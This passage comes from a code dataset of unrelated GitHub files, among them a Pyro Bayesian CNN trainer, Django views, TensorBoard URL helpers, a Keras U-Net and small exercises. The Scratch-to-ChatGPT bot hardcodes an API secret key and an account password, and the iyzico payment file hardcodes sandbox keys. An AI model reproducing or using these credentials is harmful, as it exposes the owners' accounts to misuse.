nn.Dropout(p)\n        \n        self.fc1 = PyroModule[torch.nn.Linear](1*9*9, 25)\n        self.fc1.weight = PyroSample(prior.expand([25, 1*9*9]).to_event(2))\n        self.fc1.bias = PyroSample(prior.expand([25]).to_event(1))\n\n        self.fc2 = PyroModule[torch.nn.Linear](25, 10)\n        self.fc2.weight = PyroSample(prior.expand([10, 25]).to_event(2))\n        self.fc2.bias = PyroSample(prior.expand([10]).to_event(1))\n\n\n    \n    def forward(self, x: torch.Tensor, y: torch.Tensor = None) -> float:\n        \"\"\"Define a forward pass through the network.\n        For a pyro network using SVI, forward is invoked in svi.step \n\n\n        Args:\n            x (torch.Tensor): Input data\n            y (torch.Tensor, optional): True class. 
Defaults to None.\n\n Returns:\n [type]: [description]\n \"\"\"\n\n x = F.relu(F.max_pool2d(self.conv1(x), 2))\n x = torch.flatten(x, 1)\n x = self.dropout(x)\n x = F.relu(self.fc1(x))\n x = self.dropout(x)\n x = self.fc2(x)\n with pyro.plate(\"data\", size=x.shape[0]):\n # Probs approach\n probs = deterministic(\"probs\", torch.exp(F.log_softmax(x, dim=1)))\n obs = pyro.sample(\"obs\", Categorical(probs=probs), obs=y)\n\n return probs\n\n\n#########################\n### Plotting Utils ######\n#########################\n\n@torch.no_grad()\ndef plot_param_samples(model: Union[BCNNWeak, pyro.infer.autoguide.guides.AutoDiagonalNormal], nsamples) -> None:\n \"\"\"Plot the weight and bias for one parameter set per layer\n\n Args:\n model (Union[BCNNWeak, pyro.infer.autoguide.guides.AutoDiagonalNormal]): Either a pyro model (prior) or guide (posterior)\n nsamples ([type]): number of samples to draw\n \"\"\"\n\n # For prior predictive\n if type(model) == BCNNWeak:\n layer_dict ={\n \"fc1\" : model.fc1,\n \"fc2\" : model.fc2\n }\n def weight_accessor(layer):\n return layer_dict[layer].weight\n def bias_accessor(layer):\n return layer_dict[layer].bias\n # For posterior predictive\n elif type(model) == pyro.infer.autoguide.guides.AutoDiagonalNormal:\n def weight_accessor(layer):\n return model.forward()[f\"{layer}.weight\"]\n def bias_accessor(layer):\n return model.forward()[f\"{layer}.bias\"]\n\n layers = [\"fc1\",\"fc2\"]\n\n # setup plot\n nlayers = len(layers)\n fig, ax_enum = plt.subplots(nrows=nlayers, ncols=2)\n\n # plot 1 posterior for all layers\n # sample weights and biases (for all nodes)\n weights = [[],[]]\n biases = [[],[]]\n\n for i, layer in enumerate(layers):\n\n for _ in range(nsamples):\n weights[i].append(torch.flatten(weight_accessor(layer)).numpy())\n biases[i].append(torch.flatten(bias_accessor(layer)).numpy())\n\n # Plot weight\n plt.sca(ax_enum[i,0])\n az.plot_kde(weights[i],ax=ax_enum[i,0])\n ax_enum[i,0].get_yaxis().set_visible(False)\n ax_enum[i,0].set_title(\"all nodes - weight\")\n\n # Plot bias\n plt.sca(ax_enum[i,1])\n az.plot_kde(biases[i], ax=ax_enum[i,1])\n ax_enum[i,1].get_yaxis().set_visible(False)\n ax_enum[i,1].set_title(\"all nodes - bias\")\n plt.tight_layout()\n return(weights,biases)\n\n\ndef plot_loss(train_loss: np.array, test_loss: np.array) -> None:\n\n fig = plt.figure(figsize=(8,8))\n marker_size = 4\n # Training Loss \n plt.plot(\n np.arange(1, len(train_loss)+1),\n train_loss,\n markersize=marker_size,\n color=\"orange\",\n marker=\"o\",\n label=\"Training Loss\",\n alpha=0.8 \n )\n\n plt.plot(\n np.arange(1, len(test_loss)+1),\n test_loss,\n markersize=marker_size,\n color=\"dodgerblue\",\n marker=\"o\",\n label=\"Testing Loss\",\n alpha=0.8\n )\n plt.yscale(\"log\")\n plt.xlabel(\"Epoch\", fontsize=14)\n plt.ylabel(\"Loss\", fontsize=14)\n plt.legend(frameon=False)\n\n\nif __name__ == \"__main__\":\n\n cfg = load_configuration_file(sys.argv[1])\n EPOCHS=cfg[\"epochs\"]\n\n if not os.path.exists(f\"{cfg['plotDirectory']}/train/\"):\n os.makedirs(f\"{cfg['plotDirectory']}/train/\")\n\n train_loader, _ = load_data(\n ds_start=0, ds_end=60000, train=True,\n useGPU=cfg[\"useGPU\"], b_size=cfg[\"batch_size\"], exclude_number=cfg[\"trainExcludeOneNumber\"]\n )\n\n test_loader, _ = load_data(\n ds_start=0, ds_end=10000, train=False,\n useGPU=cfg[\"useGPU\"], b_size=cfg[\"batch_size\"], exclude_number=cfg[\"testExcludeOneNumber\"]\n )\n \n pyro.enable_validation(True)\n pyro.clear_param_store()\n # Create Bayesian Convolutional Neural Net\n model = 
BCNNWeak(p=0.2, prior_std=1)\n \n # Create Guide - approximation to posterior\n # A parameterized distribution of variational parameters\n guide = AutoDiagonalNormal(model)\n\n # Create SVI object\n # Use trace elbo as loss - \"Evidence lower bound\"\n # Maximizing elbo minimizes KL divergence\n svi = pyro.infer.SVI(\n model,\n guide,\n optim=pyro.optim.ClippedAdam({'lr':1e-2}),\n loss=pyro.infer.Trace_ELBO()\n )\n\n # Plot prior distributions\n print(\"Plotting prior samples\")\n plot_param_samples(model, 5000)\n plt.savefig(f\"{cfg['plotDirectory']}/train/prior_predictive.png\")\n\n \n epoch_loss = np.zeros(EPOCHS)\n test_loss = np.zeros(EPOCHS)\n for k in range(len(epoch_loss)):\n if k%5 ==0: print(f\"epoch {k}\")\n loss = 0\n \n # Do training step\n for x, y in train_loader:\n # SVI.step -> take a single gradient step, return loss estimate\n loss += svi.step(x, y)\n epoch_loss[k] = loss\n \n # Do testing evaluation\n loss = 0\n for x, y in test_loader:\n # SVI.evaluate_loss -> get loss estimate without gradient step\n loss += svi.evaluate_loss(x, y)\n test_loss[k] = loss\n\n plot_loss(train_loss=epoch_loss/len(train_loader.dataset), test_loss=test_loss/len(test_loader.dataset))\n plt.savefig(f\"{cfg['plotDirectory']}/train/bnn_loss.png\")\n\n # Create Predictive model\n predictive = Predictive(\n model, guide=guide, num_samples=cfg[\"samples\"])\n print(f\"Final Loss {epoch_loss[-1]}\")\n\n # Plot posterior distributions\n allweights, allbiases = plot_param_samples(guide, 10000)\n hf = h5py.File(f\"{cfg['plotDirectory']}/train/posterior_predictive.h5\", 'w')\n hf.create_dataset('train_loss', data = epoch_loss/len(train_loader.dataset))\n hf.create_dataset('test_loss', data = test_loss/len(test_loader.dataset))\n hf.create_dataset('bias_layer0',data = allbiases[0])\n hf.create_dataset('bias_layer1',data = allbiases[1])\n hf.close()\n plt.savefig(f\"{cfg['plotDirectory']}/train/posterior_predictive.png\")\n\n\n # Save the bcnn\n torch.save({\n cfg[\"model_name\"]: predictive,\n cfg[\"state_dict\"]: predictive.state_dict(),\n #\"bcnn_guide\": guide, # TODO: Drop if not useful in the future\n #\"bcnn_svi\" : svi,\n #\"bcnn_model\": model\n }, cfg[\"model_file\"])\n\n\n # We'll get majority logic accuracy\n correct_arr = []\n y_hat = np.zeros(shape=(len(test_loader.dataset)))\n y_true = np.zeros(shape=(len(test_loader.dataset)))\n print(\"Starting to evaluate majority logic accuracy (abort if this isn't useful to you.)\")\n for i, (x, y) in enumerate(test_loader):\n print(f\"Progress - {round(100*i/len(test_loader))}% done\")\n preds = predictive(x)\n max_indices = torch.sort(torch.exp(preds[\"probs\"]), dim=2, descending=True).indices[:,:,0] \n\n block_start = i * test_loader.batch_size\n block_end = block_start + len(y)\n y_hat[block_start:block_end] = stats.mode(max_indices, 0).mode[0,:]\n y_true[block_start:block_end] = y\n\n acc = sum(np.array(y_hat) == np.array(y_true)) / len(y_true)\n print(f\"Majority logic accuracy = {acc}\") \n\n\n","repo_name":"bdongmd/DUQ","sub_path":"bnn.py","file_name":"bnn.py","file_ext":"py","file_size_in_byte":9374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29969391243","text":"from django.views.generic import ListView, DetailView\nfrom .models import Post\n\nclass PostsList(ListView):\n model = Post\n ordering = '-dateCreation'\n template_name = 'news/posts.html'\n context_object_name = 'posts'\n\n def get_context_data(self, **kwargs):\n context = super().get_context_data(**kwargs)\n 
context['all_news'] = Post.objects.all()\n return context\n\n\nclass PostDetail(DetailView):\n model = Post\n template_name = 'news/post.html'\n context_object_name = 'post'\n","repo_name":"lmi-1/project_d3","sub_path":"NewsPaper/news/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"26552736230","text":"from typing import Sequence, Dict\nfrom google.cloud.aiplatform_v1beta1.services.tensorboard_service.client import (\n TensorboardServiceClient,\n)\n\n_SERVING_DOMAIN = \"tensorboard.googleusercontent.com\"\n\n\ndef _parse_experiment_name(experiment_name: str) -> Dict[str, str]:\n \"\"\"Parses an experiment_name into its component segments.\n\n Args:\n experiment_name: Resource name of the TensorboardExperiment. E.g.\n \"projects/123/locations/asia-east1/tensorboards/456/experiments/exp1\"\n\n Returns:\n Components of the experiment name.\n\n Raises:\n ValueError: If the experiment_name is invalid.\n \"\"\"\n matched = TensorboardServiceClient.parse_tensorboard_experiment_path(\n experiment_name\n )\n if not matched:\n raise ValueError(f\"Invalid experiment name: {experiment_name}.\")\n return matched\n\n\ndef get_experiment_url(experiment_name: str) -> str:\n \"\"\"Get URL for comparing experiments.\n\n Args:\n experiment_name: Resource name of the TensorboardExperiment. E.g.\n \"projects/123/locations/asia-east1/tensorboards/456/experiments/exp1\"\n\n Returns:\n URL for the tensorboard web app.\n \"\"\"\n location = _parse_experiment_name(experiment_name)[\"location\"]\n name_for_url = experiment_name.replace(\"/\", \"+\")\n return f\"https://{location}.{_SERVING_DOMAIN}/experiment/{name_for_url}\"\n\n\ndef get_experiments_compare_url(experiment_names: Sequence[str]) -> str:\n \"\"\"Get URL for comparing experiments.\n\n Args:\n experiment_names: Resource names of the TensorboardExperiments that needs to\n be compared.\n\n Returns:\n URL for the tensorboard web app.\n \"\"\"\n if len(experiment_names) < 2:\n raise ValueError(\"At least two experiment_names are required.\")\n\n locations = {\n _parse_experiment_name(experiment_name)[\"location\"]\n for experiment_name in experiment_names\n }\n if len(locations) != 1:\n raise ValueError(\n f\"Got experiments from different locations: {', '.join(locations)}.\"\n )\n location = locations.pop()\n\n experiment_url_segments = []\n for idx, experiment_name in enumerate(experiment_names):\n name_segments = _parse_experiment_name(experiment_name)\n experiment_url_segments.append(\n \"{cnt}-{experiment}:{project}+{location}+{tensorboard}+{experiment}\".format(\n cnt=idx + 1, **name_segments\n )\n )\n encoded_names = \",\".join(experiment_url_segments)\n return f\"https://{location}.{_SERVING_DOMAIN}/compare/{encoded_names}\"\n","repo_name":"googleapis/python-aiplatform","sub_path":"google/cloud/aiplatform/utils/tensorboard_utils.py","file_name":"tensorboard_utils.py","file_ext":"py","file_size_in_byte":2551,"program_lang":"python","lang":"en","doc_type":"code","stars":433,"dataset":"github-code","pt":"68"} +{"seq_id":"33596557651","text":"# import sqlite3\nimport iyzipay\nimport json\n\nfrom .data import veri\n# db = sqlite3.connect(\"db.sqlite3\")\n\n# vt = db.cursor()\n\n# oku = vt.execute(\"SELECT * from iyzico_payment\")\n# veri = oku.fetchall()[-1]\n\n# vt.close()\n\noptions = {\n 'api_key': \"sandbox-xMmsty6A68us9iGfhLxIm7UVQ4WRSlQy\",\n 'secret_key': \"sandbox-QQnp3eC4j2kYe5nCS0nogK4H0gCau9HH\",\n 'base_url': 
iyzipay.base_url\n}\n\n\n\npayment_card = veri\n\nbuyer = veri\n\naddress = veri\n\nbasket_items = veri\n\nrequest = veri\n\n\ndef ode():\n\n payment = iyzipay.Payment().create(request, options)\n\n ode = payment.read().decode('utf-8')\n dic = json.loads(ode)\n print(dic)\n\n return dic[\"status\"]\n\n\n\n \n\n\n","repo_name":"oftopaloglu/TiklaAl","sub_path":"iyzico/create_payment.py","file_name":"create_payment.py","file_ext":"py","file_size_in_byte":668,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"12763268924","text":"# Clean XML page and return only clean text.\ndef cleanPage(xmlpage):\n\n import xml.etree.ElementTree as ET\n\n tree = ET.fromstring(xmlpage)\n\n for node in tree.iter():\n if node.tag == 'text':\n text = node.text\n if text is None:\n return '#redirect'\n else:\n text = text.replace('\\n', ' ').replace('\\r', '')\n text = text.lower()\n\n return text\n\n\n\n\n","repo_name":"duarteocarmo/BigData_WikipediaInspector","sub_path":"Project/P1_Clean_Page.py","file_name":"P1_Clean_Page.py","file_ext":"py","file_size_in_byte":450,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"24212551898","text":"from trytond.model import ModelSQL, ModelView, fields\nfrom trytond.pool import Pool\n\n\nclass Allocation(ModelSQL, ModelView):\n 'Allocation'\n __name__ = 'project.allocation'\n employee = fields.Many2One(\n 'company.employee', \"Employee\", required=True, ondelete='CASCADE')\n work = fields.Many2One(\n 'project.work', \"Work\", required=True, ondelete='CASCADE')\n percentage = fields.Float('Percentage', digits=(16, 2), required=True,\n domain=[('percentage', '>', 0.0)])\n\n @staticmethod\n def default_percentage():\n return 100\n\n def get_rec_name(self, name):\n return self.employee.rec_name\n\n @classmethod\n def search_rec_name(cls, name, clause):\n return [('employee.rec_name',) + tuple(clause[1:])]\n\n @classmethod\n def write(cls, *args):\n Work = Pool().get('project.work')\n super(Allocation, cls).write(*args)\n\n works = Work.search([\n ('allocations', 'in',\n [a.id for allocations in args[::2] for a in allocations]),\n ])\n\n for work in works:\n work.reset_leveling()\n for work in works:\n work.compute_dates()\n\n @classmethod\n def create(cls, vlist):\n allocations = super(Allocation, cls).create(vlist)\n for allocation in allocations:\n allocation.work.reset_leveling()\n allocation.work.compute_dates()\n return allocations\n\n @classmethod\n def delete(cls, allocations):\n works = [a.work for a in allocations]\n super(Allocation, cls).delete(allocations)\n\n for work in works:\n work.reset_leveling()\n for work in works:\n work.compute_dates()\n","repo_name":"tryton/tryton","sub_path":"modules/project_plan/allocation.py","file_name":"allocation.py","file_ext":"py","file_size_in_byte":1712,"program_lang":"python","lang":"en","doc_type":"code","stars":27,"dataset":"github-code","pt":"68"} +{"seq_id":"12558597703","text":"import openai\nimport scratchattach as sa\nimport time\n\n# Set up your OpenAI API credentials\nopenai.api_key = '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'\ns = sa.login (\"LightingGun_test\", \"yale1288\")\nconn = s.connect_cloud (\"882220066\")\nword = {'a': '10', 'b': '11', 'c': '12', 'd': '13', 'e': '14', 'f': '15', 'g': '16', 'h': '17', 'i': '18', 'j': '19', 'k': '20', 'l': '21', 'm': '22', 'n': '23', 'o': '24', 'p': '25', 'q': '26', 'r': '27', 's': '28', 't': '29', 'u': '30', 'v': '31', 'w': '32', 'x': '33', 'y': 
'34', 'z': '35', \" \":\"36\", \"!\":\"37\", \"?\":\"38\", \",\":\"39\", \".\":\"40\", \"'\":\"41\"}\n \ndef encode(value):\n global word\n val = value.lower()\n res = \"\"\n word = {'a': '10', 'b': '11', 'c': '12', 'd': '13', 'e': '14', 'f': '15', 'g': '16', 'h': '17', 'i': '18', 'j': '19', 'k': '20', 'l': '21', 'm': '22', 'n': '23', 'o': '24', 'p': '25', 'q': '26', 'r': '27', 's': '28', 't': '29', 'u': '30', 'v': '31', 'w': '32', 'x': '33', 'y': '34', 'z': '35', \" \":\"36\", \"!\":\"37\", \"?\":\"38\", \",\":\"39\", \".\":\"40\", \"'\":\"41\"} \n for w in val:\n res = res + word[w]\n res = res + \"00\"\n print(res)\n return res\n #Define a function to send a message and receive a response from ChatGPT\ndef chat_with_gpt(conversation):\n response = openai.Completion.create(\n engine='text-davinci-002',\n prompt=conversation,\n max_tokens=1000,\n temperature=0.7,\n n=1,\n stop=None,\n timeout=None\n )\n return response.choices[0].text.strip()\n\ndef decode(value):\n decoded = \"\"\n a = list(value)\n for i in range(0,int(len(a)/2)-1):\n #print(str(a[i]+a[i+1]))\n decoded = decoded + list(word)[list(word.values()).index(str(a[2*i])+ str(a[2*i+1]))]\n return decoded\n# Start a conversation with ChatGPT\ndef start_chat():\n print(\"Welcome to ChatGPT! Type 'exit' to end the conversation.\")\n\n conversation = \"\"\n\n while True:\n while True:\n old = sa.get_var(\"882220066\",\"to_host\")\n time.sleep(1)\n if not old == sa.get_var(\"882220066\",\"to_host\"):\n print(\"not\")\n break\n \n dec = decode(sa.get_var(\"882220066\",\"to_host\"))\n user_input = dec\n\n if user_input.lower() == 'exit':\n break\n\n # Concatenate user input and conversation history\n conversation += \"You: \" + user_input + \"\\n\"\n conversation += \"ChatGPT: \"\n\n # Get response from ChatGPT\n response = chat_with_gpt(conversation)\n\n print(\"ChatGPT:\", response)\n encoded = encode(response)\n conn.set_var(\"from_host\", encoded)\n print(\"sent\")\n\n # Add ChatGPT response to conversation\n conversation += response + \"\\n\"\n\n# Call the start_chat function to begin the conversation\nstart_chat()\n","repo_name":"MomoCoder123/OpenAI-test","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2791,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29987435885","text":"\"\"\"\na class to describe an insertion profile of a single residue into the membrane\n\"\"\"\nfrom MPs.SplineCalibrationVars import *\nimport sys\nimport numpy as np\nfrom scipy import interpolate\nfrom utils.Logger import lgr\n\n\nclass InsertionProfile:\n \"\"\"\n a single residue insertion profile described by either a sorted list of\n PoZEnergy instances (poz_energy) or by polynum\n \"\"\"\n def __init__(self, aa: str, pos_score: dict,\n membrane_half_depth: int=MEMBRANE_HALF_WIDTH,\n residue_num: int=NUM_AAS, adjust_extra_membranal=True,\n poly_edges: list=[]):\n \"\"\"\n\n \"\"\"\n self.AA = aa\n self.membrane_half_depth = membrane_half_depth\n self.residue_num = residue_num\n self.pos_score = pos_score\n self.extramembrane_adjusted = False\n self.poly_edges = poly_edges\n\n def __repr__(self):\n res = '\\n' % self.AA\n res += '\\t\\n'\n # for a in self.poz_energy:\n # res += '\\t\\t<%s/>\\n' % a\n res += '\\t\\n'\n # print('ddd', self.polynom)\n try:\n res += '' % self.polynom\n except:\n pass\n res += '\\n' % self.AA\n return res\n\n def within_edges(self, pnt) -> bool:\n return self.poly_edges[0] <= pnt <= self.poly_edges[1]\n\n def polynom_at_z(self, z: 
float) -> float:\n        \"\"\"\n        returns the polynomial's value at z\n        :type z: float\n        \"\"\"\n        return np.polyval(self.polynom, z)\n\n    def format_polyval(self):\n        \"\"\"\n        print the polyval values for table\n        \"\"\"\n        return ' '.join([str(a) for a in self.polynom])\n\n    def format_spline_energies(self):\n        \"\"\"\n        :return: string of all energies separated by spaces\n        \"\"\"\n        if self.AA not in SKIP_AAS:\n            return ' '.join(str(self.pos_score[pos]\n                                if -SPLINE_LIM <= POS_Z_TOT[pos] <=\n                                SPLINE_LIM else 0.0) for pos in POS_RANGE)\n        else:\n            lgr.log(\"creating %s spline as 0.0\" % self.AA)\n            return ' '.join(\"0.0\" for pos in POS_RANGE)\n\n    def rmsd_ips(self, other) -> float:\n        \"\"\"\n        returns the difference between the IPs, calculated as RMSD over Z\n        \"\"\"\n        res = 0.0\n        for pos in range(1, TOTAL_AAS+1):\n            if self.poly_edges[0] <= POS_Z_TOT[pos] <= self.poly_edges[1]:\n                res += (self.pos_score[pos] - other.pos_score[pos])**2\n        return np.sqrt(np.mean(res))\n\n    def adjust_exta_membrane(self):\n        \"\"\"\n        set all positions outside [-15, 15] to 0. use only for setting splines in Rosetta\n        :return:\n        \"\"\"\n        self.extramembrane_adjusted = True\n        print('ADJUSTING !!! !STOP ME !!!!')\n        sys.exit()\n        for pos in POS_RANGE:\n            if -15 > POS_Z_TOT[pos] or +15 < POS_Z_TOT[pos]:\n                self.pos_score[pos] = 0\n\n\n# def pos_energy_dict_to_PoZEnergy_list(pos_energy_dict: dict) -> list():\n#     \"\"\"\n#     creates an ordered list of PoZEnergy instances corresponding to their positions\n#     \"\"\"\n#     result = []\n#     for pos in range(1, TOTAL_AAS+1):\n#         result.append(PoZEnergy(pos, POS_Z_TOT[pos], pos_energy_dict[pos]))\n#     return result\n\n\ndef subtract_IP_from_IP(ip1: InsertionProfile, ip2: InsertionProfile, verbose: bool = False, smooth: bool=True) -> InsertionProfile:\n    \"\"\"\n    \"\"\"\n    new_pos_score = {}\n    if not smooth:\n        for pos in POS_RANGE:\n            new_pos_score[pos] = ip1.pos_score[pos] - ip2.pos_score[pos]\n    else:\n        # smooth the transition from water to membrane between +/-15A to\n        # +/-25A for resulting splines\n        y, x = [], []\n        for pos in POS_RANGE:\n            if -SPLINE_LIM > POS_Z_TOT[pos] or POS_Z_TOT[pos] > SPLINE_LIM:\n                y.append(0.0)\n                x.append(pos)\n            elif ip1.poly_edges[0] <= POS_Z_TOT[pos] <= ip1.poly_edges[1]:\n                y.append(ip1.pos_score[pos] - ip2.pos_score[pos])\n                x.append(pos)\n        tck = interpolate.splrep(x, y, s=SPLINE_SMOOTHNESS)\n        new_pos_score = {pos: interpolate.splev(pos, tck)\n                         if -SPLINE_LIM <= POS_Z_TOT[pos] <= +SPLINE_LIM else 0.0\n                         for pos in POS_RANGE}\n\n    return InsertionProfile(ip1.AA, new_pos_score)\n\n\ndef add_IP_to_IP(ip1: InsertionProfile, ip2: InsertionProfile, verbose: bool = False) -> InsertionProfile:\n    \"\"\"\n    \"\"\"\n    new_pos_score = {}\n    for pos in POS_RANGE:\n        # accumulate per-position sums rather than rebinding the dict\n        new_pos_score[pos] = ip1.pos_score[pos] + ip2.pos_score[pos]\n        if verbose:\n            print(pos, ip1.pos_score[pos], ip2.pos_score[pos],\n                  ip1.pos_score[pos]+ip2.pos_score[pos])\n    return InsertionProfile(ip1.AA, new_pos_score)\n\n","repo_name":"Fleishman-Lab/membrane_protein_energy_function","sub_path":"MPs/InsertionProfiles.py","file_name":"InsertionProfiles.py","file_ext":"py","file_size_in_byte":4891,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"22705500971","text":"\"\"\"\nWe make use of queues to do the level order traversal. \nWe visit a node and put its left and right child in the queue\nand delete the current node. 
\nIn this way we visit the tree in level order.\n\"\"\"\n\nclass Node:\n\n def __init__(self,data):\n\n self.left = None\n\n self.right = None\n\n self.data = data\n\ndef level_order(queue):\n\n if len(queue) == 0:\n\n return\n\n node = queue[0]\n\n queue.pop(0)\n\n if node.left:\n\n queue.append(node.left)\n\n if node.right:\n\n queue.append(node.right)\n\n print(node.data)\n\n level_order(queue)\n\nqueue = list()\n\nroot = Node(1)\n\nqueue.append(root)\n\nroot.left = Node(2)\n\nroot.right = Node(3)\n\nroot.left.left = Node(4)\n\nroot.left.right = Node(5)\n\nlevel_order(queue)\n\n# 1 2 3 4 5 ","repo_name":"nezlobnaya/project-algorithms","sub_path":"traversal/level_order_tree_traversal.py","file_name":"level_order_tree_traversal.py","file_ext":"py","file_size_in_byte":857,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"14973136197","text":"import sys\n\nsys.stdin = open(\"_모음이보이지않는사람.txt\")\n\nT = int(input())\n\nfor tc in range(1, T + 1):\n S = input()\n res = ''\n\n for ch in S:\n if ch not in 'aeiou':\n res += ch\n\n print(f'#{tc} {res}')","repo_name":"jupiter6676/TIL","sub_path":"Project/01-PJT-05/1_모음이보이지않는사람.py","file_name":"1_모음이보이지않는사람.py","file_ext":"py","file_size_in_byte":239,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"68"} +{"seq_id":"24078584451","text":"# %% Imports\n\nimport gc\n\nimport numpy\nimport tensorflow\nfrom tensorflow import keras, data\nfrom keras import layers\nimport matplotlib.pyplot as pyplot\nfrom tqdm import tqdm\n\n# Check for GPU\nprint(tensorflow.config.list_physical_devices(\"GPU\"))\n\nBATCH_COUNT = 100\nWIDTH = 256\nHEIGHT = 256\nSIZE = (WIDTH, HEIGHT)\nINPUT_BATCHES_DIR = f\"training_inputs_{WIDTH}_{HEIGHT}_batched/\"\nLABEL_BATCHES_DIR = f\"training_labels_{WIDTH}_{HEIGHT}_batched/\"\nINPUTS_DIR = f\"training_inputs_{WIDTH}_{HEIGHT}/\"\nLABELS_DIR = f\"training_labels_{WIDTH}_{HEIGHT}/\"\n\n# %% Load index\n\nindex = []\nfor idx in range(BATCH_COUNT):\n index.append(\"batch_\" + str(idx))\n \nprint(index)\n\n# %% Load dataset\n\n\n\n# %% Model\n\nclass EncoderBlock(layers.Layer):\n def __init__(self, n_filters, max_pooling=True):\n super().__init__()\n self.max_pooling = max_pooling\n self.conv_1 = layers.Conv2D(n_filters, kernel_size=3, activation='relu', padding='same')\n if max_pooling:\n self.max_pool = layers.MaxPool2D(pool_size=(2, 2), strides=2, padding='same')\n \n def call(self, inputs):\n x = self.conv_1(inputs)\n skip = x\n if self.max_pooling:\n x = self.max_pool(x)\n return x, skip\n\nclass DecoderBlock(layers.Layer):\n def __init__(self, n_filters, width, height):\n super().__init__()\n self.up_sampling = layers.UpSampling2D(size=(2, 2))\n self.crop = layers.CenterCrop(width, height)\n self.concat = layers.Concatenate(axis=3)\n self.conv_1 = layers.Conv2DTranspose(n_filters, kernel_size=3, activation='relu', padding='same')\n \n def call(self, inputs, skip):\n x = self.up_sampling(inputs)\n x = self.crop(x)\n x = self.concat([x, skip])\n x = self.conv_1(x)\n return x\n\nclass Encoder(layers.Layer):\n def __init__(self):\n super().__init__()\n self.block_1 = EncoderBlock(8)\n self.block_2 = EncoderBlock(16)\n self.block_3 = EncoderBlock(32)\n self.block_4 = EncoderBlock(64, max_pooling=False)\n \n def call(self, inputs):\n x, skip_1 = self.block_1(inputs)\n x, skip_2 = self.block_2(x)\n x, skip_3 = self.block_3(x)\n x, _ = self.block_4(x)\n return x, skip_1, skip_2, skip_3\n\nclass Decoder(layers.Layer):\n def 
__init__(self):\n super().__init__()\n self.block_1 = DecoderBlock(32, WIDTH//4, HEIGHT//4)\n self.block_2 = DecoderBlock(16, WIDTH//2, HEIGHT//2)\n self.block_3 = DecoderBlock(8, WIDTH, HEIGHT)\n self.conv_out = layers.Conv2DTranspose(1, kernel_size=3, activation='sigmoid', padding='same')\n \n def call(self, inputs, skip_1, skip_2, skip_3):\n x = self.block_1(inputs, skip_3)\n x = self.block_2(x, skip_2)\n x = self.block_3(x, skip_1)\n x = self.conv_out(x)\n return x\n\nclass UNet(keras.Model):\n def __init__(self):\n super().__init__()\n self.encoder = Encoder()\n self.decoder = Decoder()\n \n def call(self, inputs, training=False):\n x, skip_1, skip_2, skip_3 = self.encoder(inputs)\n outputs = self.decoder(x, skip_1, skip_2, skip_3)\n return outputs\n\n# %%\n\nmodel = UNet()\nmodel.compile(\n optimizer=keras.optimizers.Adam(learning_rate=1e-3),\n loss=\"binary_crossentropy\",\n metrics=[\"binary_accuracy\"]\n)\n\n# %%\n\nhists = []\nfor epoch in range(10):\n for batch in tqdm(range(BATCH_COUNT)):\n inputs = numpy.load(INPUT_BATCHES_DIR + \"batch_\" + str(batch) + \".npy\")\n labels = numpy.load(LABEL_BATCHES_DIR + \"batch_\" + str(batch) + \".npy\")\n hist = model.fit(inputs, labels, verbose=0)\n hists.append(hist)\n gc.collect()\n","repo_name":"Chorizoman01/ai-skin-lesion-detection-","sub_path":"scripts/model_old.py","file_name":"model_old.py","file_ext":"py","file_size_in_byte":3666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"68"} +{"seq_id":"24212344699","text":"from django.http import HttpResponse\n\nfrom django.template import Template,Context\n\nfrom django.shortcuts import render\n\nfrom django.shortcuts import loader\nclass Persona(object):\n\n def __init__(self,nombre,edad,rol):\n\n self.nombre=nombre\n\n self.edad=edad\n\n self.rol=rol\n\ndef saludo(request):\n\n Mi_persona=Persona(\"Franco Daniel Capra\",23,\"Ayudante\")\n\n Lista_de_temas=[\"Condicionales\",\"Control de flujo\",\"Listas\",\"Tuplas y diccionarios\",\"Funciones\"]\n\n Diccionario_plantilla={\"mi_nombre\":Mi_persona.nombre,\"mi_edad\":Mi_persona.edad,\"mi_rol\":Mi_persona.rol,\"lista_temas\":Lista_de_temas}\n\n documento_externo=loader.get_template(\"Plantilla_base.html\")\n\n documento_cargado=documento_externo.render(Diccionario_plantilla)\n\n return HttpResponse(documento_cargado)\n\ndef Plantilla_Heredada(request):\n\n return render(request,\"CursoC.html\")","repo_name":"fradaca/Proyectos_Django","sub_path":"Curso_Tutorial/Curso_Tutorial/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"69866235736","text":"#56: Cell Phone Bill\r\na=float(input(\"Enter the number of minutes:\"))\r\nb=float(input(\"Enter the number of text messages:\"))\r\nif a<50 and b<50:\r\n baseCharge=round(15,2)\r\nelse:\r\n baseCharge=round((15+(a-50)*0.25+(b-50)*0.15),2)\r\nprint(\"Base charge:$\",baseCharge)\r\nprint(\"911 fee:$ 0.44\")\r\nprint(\"Tax:$\",round(0.05*(baseCharge+0.44),2))\r\nprint(\"Total bill:$\",round((baseCharge + 0.44+0.05*(baseCharge+0.44)),2))\r\n\r\n","repo_name":"L0ganhowlett/Python_workbook-Ben_Stephenson","sub_path":"56 Cell Phone Bill.py","file_name":"56 Cell Phone Bill.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"68"} +{"seq_id":"31767190868","text":"#!/usr/bin/python3\nimport numpy as np\nfrom sprandn import sprandn\nimport matplotlib.pyplot 
